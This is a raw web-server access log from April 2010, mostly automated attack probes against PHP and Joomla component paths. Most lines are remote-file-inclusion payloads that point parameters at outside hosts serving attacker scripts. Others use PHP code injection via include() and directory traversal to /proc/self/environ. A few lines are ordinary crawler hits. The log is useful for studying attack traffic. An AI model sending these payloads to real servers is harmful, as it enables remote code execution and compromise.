61.135.134.108 - - [26/Apr/2010:07:39:52 -0500] "GET /logs/access_log.1263340800//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
61.135.134.108 - - [26/Apr/2010:07:39:54 -0500] "GET //?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
61.135.134.108 - - [26/Apr/2010:07:39:55 -0500] "GET /logs//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 3223 "-""Mozilla/5.0"
61.135.134.108 - - [26/Apr/2010:07:39:55 -0500] "GET //?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
61.135.134.108 - - [26/Apr/2010:07:39:55 -0500] "GET /logs/access_log.1263340800//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
61.135.134.108 - - [26/Apr/2010:07:40:03 -0500] "GET //?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
61.135.134.108 - - [26/Apr/2010:07:40:03 -0500] "GET /logs/access_log.1263340800//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
61.135.134.108 - - [26/Apr/2010:07:40:03 -0500] "GET /logs//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 3223 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:40:04 -0500] "GET /logs/access_log.1212969600%20%20//?path%5Bdocroot%5D=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
61.135.134.108 - - [26/Apr/2010:07:40:09 -0500] "GET //?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
61.135.134.108 - - [26/Apr/2010:07:40:09 -0500] "GET /logs//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 3223 "-""Mozilla/5.0"
61.135.134.108 - - [26/Apr/2010:07:40:09 -0500] "GET /logs/access_log.1263340800%22%20target=%22_blank//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
61.135.134.108 - - [26/Apr/2010:07:40:23 -0500] "GET /logs/access_log.1263340800//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
61.135.134.108 - - [26/Apr/2010:07:40:24 -0500] "GET //?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
61.135.134.108 - - [26/Apr/2010:07:40:24 -0500] "GET /logs//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 3223 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:41:05 -0500] "GET /logs/access_log.1212969600%20%20//?path%5Bdocroot%5D=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
61.33.191.150 - - [26/Apr/2010:07:43:34 -0500] "GET /logs/access_log.1270598400%20%20//styles/internal/header.php?tpl_pgb_moddir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
61.33.191.150 - - [26/Apr/2010:07:43:34 -0500] "GET /logs//styles/internal/header.php?tpl_pgb_moddir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
61.33.191.150 - - [26/Apr/2010:07:43:37 -0500] "GET //styles/internal/header.php?tpl_pgb_moddir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
61.33.191.150 - - [26/Apr/2010:07:44:00 -0500] "GET /logs/access_log.1270684800%20%20//styles/internal/header.php?tpl_pgb_moddir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
66.59.48.68 - - [26/Apr/2010:07:46:26 -0500] "GET /logs/access_log.1268956800/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
66.59.48.68 - - [26/Apr/2010:07:46:59 -0500] "GET /logs/access_log.1268956800/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:47:30 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:47:30 -0500] "GET /logs/access_log.1219363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:47:30 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:47:35 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:47:35 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:47:35 -0500] "GET /logs/access_log.1219363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:52:05 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:52:08 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:52:12 -0500] "GET /logs/access_log.1219708800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:52:12 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:52:12 -0500] "GET /logs/access_log.1220054400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:52:15 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:52:15 -0500] "GET /logs/access_log.1219708800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:52:15 -0500] "GET /logs/access_log.1220054400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
77.92.94.85 - - [26/Apr/2010:07:55:11 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://77.92.94.85/echos.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.813"
77.92.94.85 - - [26/Apr/2010:07:55:11 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://77.92.94.85/echos.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.813"
77.92.94.85 - - [26/Apr/2010:07:55:11 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://77.92.94.85/echos.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.813"
77.92.94.85 - - [26/Apr/2010:07:55:15 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://77.92.94.85/echos.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.813"
75.126.28.140 - - [26/Apr/2010:07:57:39 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:57:39 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:57:39 -0500] "GET /logs/access_log.1219708800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
207.46.204.178 - - [26/Apr/2010:08:01:25 -0500] "GET /?S=D HTTP/1.1" 200 1003 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.208.79.46 - - [26/Apr/2010:08:06:34 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
74.208.79.46 - - [26/Apr/2010:08:06:34 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
74.208.79.46 - - [26/Apr/2010:08:06:34 -0500] "GET /logs/access_log.1266278400//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
74.208.79.46 - - [26/Apr/2010:08:06:36 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
74.208.79.46 - - [26/Apr/2010:08:06:36 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
74.208.79.46 - - [26/Apr/2010:08:06:36 -0500] "GET /logs/access_log.1266278400//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
74.208.79.46 - - [26/Apr/2010:08:06:36 -0500] "GET /logs/access_log.1225238400//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
74.208.79.46 - - [26/Apr/2010:08:06:40 -0500] "GET /logs/access_log.1225238400//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
74.208.79.46 - - [26/Apr/2010:08:06:41 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
74.208.79.46 - - [26/Apr/2010:08:06:41 -0500] "GET /logs/access_log.1266278400//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
74.208.79.46 - - [26/Apr/2010:08:06:43 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
74.208.79.46 - - [26/Apr/2010:08:06:53 -0500] "GET /logs/access_log.1225238400//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
207.46.199.190 - - [26/Apr/2010:08:11:01 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.62.142.217 - - [26/Apr/2010:08:11:08 -0500] "GET /logs/access_log.1264550400//1004board/skin/1004bang_music_board//error.php?dir=http://www.manolashandmadesoaps.com/alexharden/wp-content/uploads/2010/04/sc1? HTTP/1.1" 404 358 "-""Mozilla/5.0"
200.62.142.217 - - [26/Apr/2010:08:11:08 -0500] "GET //1004board/skin/1004bang_music_board//error.php?dir=http://www.manolashandmadesoaps.com/alexharden/wp-content/uploads/2010/04/sc1? HTTP/1.1" 404 331 "-""Mozilla/5.0"
200.62.142.217 - - [26/Apr/2010:08:11:08 -0500] "GET /logs//1004board/skin/1004bang_music_board//error.php?dir=http://www.manolashandmadesoaps.com/alexharden/wp-content/uploads/2010/04/sc1? HTTP/1.1" 404 336 "-""Mozilla/5.0"
200.62.142.217 - - [26/Apr/2010:08:11:09 -0500] "GET /logs/access_log.1265414400//1004board/skin/1004bang_music_board//error.php?dir=http://www.manolashandmadesoaps.com/alexharden/wp-content/uploads/2010/04/sc1? HTTP/1.1" 404 358 "-""Mozilla/5.0"
207.46.13.138 - - [26/Apr/2010:08:11:55 -0500] "GET /logs/access_log.1211587200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.59.48.68 - - [26/Apr/2010:08:14:19 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
66.59.48.68 - - [26/Apr/2010:08:14:23 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
66.59.48.68 - - [26/Apr/2010:08:14:23 -0500] "GET /logs/access_log.1250121600/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
67.222.152.66 - - [26/Apr/2010:08:14:50 -0500] "GET /logs/access_log.1262563200//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
67.222.152.66 - - [26/Apr/2010:08:14:50 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
67.222.152.66 - - [26/Apr/2010:08:14:50 -0500] "GET /logs/access_log.1262995200//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
67.222.152.66 - - [26/Apr/2010:08:14:50 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
67.222.152.66 - - [26/Apr/2010:08:14:56 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
67.222.152.66 - - [26/Apr/2010:08:14:56 -0500] "GET /logs/access_log.1262563200//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
67.222.152.66 - - [26/Apr/2010:08:14:56 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
67.222.152.66 - - [26/Apr/2010:08:14:56 -0500] "GET /logs/access_log.1262995200//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
207.46.204.197 - - [26/Apr/2010:08:15:54 -0500] "GET /logs/access_log.1206057600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.56.65.219 - - [26/Apr/2010:08:16:26 -0500] "GET /robots.txt HTTP/1.0" 404 282 "http://tomdolan.pconline.com/robots.txt""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
64.56.65.219 - - [26/Apr/2010:08:16:26 -0500] "GET / HTTP/1.0" 200 991 "http://tomdolan.pconline.com/""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
207.46.13.90 - - [26/Apr/2010:08:16:55 -0500] "GET /logs/access_log.1257552000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [26/Apr/2010:08:20:00 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [26/Apr/2010:08:20:01 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.59.48.68 - - [26/Apr/2010:08:24:01 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
66.59.48.68 - - [26/Apr/2010:08:24:01 -0500] "GET /logs/access_log.1250121600/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
66.59.48.68 - - [26/Apr/2010:08:24:01 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.222.152.66 - - [26/Apr/2010:08:29:49 -0500] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
67.222.152.66 - - [26/Apr/2010:08:29:49 -0500] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
67.222.152.66 - - [26/Apr/2010:08:29:49 -0500] "GET /logs/access_log.1268956800%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
67.222.152.66 - - [26/Apr/2010:08:30:05 -0500] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
67.222.152.66 - - [26/Apr/2010:08:30:05 -0500] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
67.222.152.66 - - [26/Apr/2010:08:30:05 -0500] "GET /logs/access_log.1268956800%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
72.55.146.200 - - [26/Apr/2010:08:31:16 -0500] "GET /logs//errors.php?error=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
72.55.146.200 - - [26/Apr/2010:08:31:16 -0500] "GET //errors.php?error=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
75.126.28.140 - - [26/Apr/2010:08:31:29 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:08:31:29 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:08:31:29 -0500] "GET /logs/access_log.1219708800//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
204.15.190.163 - - [26/Apr/2010:08:32:31 -0500] "GET //My_eGallery/index.php?basepath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 306 "-""Mozilla/5.0"
204.15.190.163 - - [26/Apr/2010:08:32:31 -0500] "GET /logs//My_eGallery/index.php?basepath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 311 "-""Mozilla/5.0"
204.15.190.163 - - [26/Apr/2010:08:32:32 -0500] "GET /logs/access_log.1220054400%20%20//My_eGallery/index.php?basepath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 335 "-""Mozilla/5.0"
84.38.160.77 - - [26/Apr/2010:08:32:54 -0500] "GET /logs//errors.php?error=http://www.cacador.sc.gov.br/administrator/id.txt??%0D?? HTTP/1.1" 404 300 "-""libwww-perl/5.76"
84.38.160.77 - - [26/Apr/2010:08:32:54 -0500] "GET //errors.php?error=http://www.cacador.sc.gov.br/administrator/id.txt??%0D?? HTTP/1.1" 404 295 "-""libwww-perl/5.76"
75.126.28.140 - - [26/Apr/2010:08:33:01 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:08:33:01 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:08:33:01 -0500] "GET /logs/access_log.1219708800//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
204.15.190.163 - - [26/Apr/2010:08:33:33 -0500] "GET //My_eGallery/index.php?basepath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 306 "-""Mozilla/5.0"
204.15.190.163 - - [26/Apr/2010:08:33:33 -0500] "GET /logs//My_eGallery/index.php?basepath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 311 "-""Mozilla/5.0"
204.15.190.163 - - [26/Apr/2010:08:33:34 -0500] "GET /logs/access_log.1220054400//My_eGallery/index.php?basepath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 333 "-""Mozilla/5.0"
91.142.208.158 - - [26/Apr/2010:08:37:23 -0500] "GET /logs/access_log.1224115200//errors.php?error=http://orelhas.pt/images/stories/id1??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
91.142.208.158 - - [26/Apr/2010:08:37:23 -0500] "GET //errors.php?error=http://orelhas.pt/images/stories/id1??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
91.142.208.158 - - [26/Apr/2010:08:37:23 -0500] "GET /logs//errors.php?error=http://orelhas.pt/images/stories/id1??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
204.15.190.163 - - [26/Apr/2010:08:38:27 -0500] "GET //playing.php//common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 311 "-""Mozilla/5.0"
204.15.190.163 - - [26/Apr/2010:08:38:27 -0500] "GET /logs//playing.php//common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 316 "-""Mozilla/5.0"
204.15.190.163 - - [26/Apr/2010:08:38:27 -0500] "GET /logs/access_log.1271030400%20%20//playing.php//common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 340 "-""Mozilla/5.0"
204.15.190.163 - - [26/Apr/2010:08:39:08 -0500] "GET /logs/access_log.1270684800%20%20//playing.php//common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 340 "-""Mozilla/5.0"
213.175.215.106 - - [26/Apr/2010:08:39:55 -0500] "GET /logs//microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 335 "-""libwww-perl/5.810"
213.175.215.106 - - [26/Apr/2010:08:39:55 -0500] "GET /logs//microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 335 "-""libwww-perl/5.810"
213.175.215.106 - - [26/Apr/2010:08:39:55 -0500] "GET //microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
213.175.215.106 - - [26/Apr/2010:08:39:55 -0500] "GET //microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
91.121.30.111 - - [26/Apr/2010:08:42:33 -0500] "GET /logs//microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 335 "-""libwww-perl/5.803"
91.121.30.111 - - [26/Apr/2010:08:42:33 -0500] "GET //microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 330 "-""libwww-perl/5.803"
128.210.142.81 - - [26/Apr/2010:08:44:28 -0500] "GET /logs//playing.php//common/db.php?commonpath=http://www.bdkorea.org/zeroboard/data/bangla01/zd1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
128.210.142.81 - - [26/Apr/2010:08:44:28 -0500] "GET /logs/access_log.1271030400%20%20//playing.php//common/db.php?commonpath=http://www.bdkorea.org/zeroboard/data/bangla01/zd1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
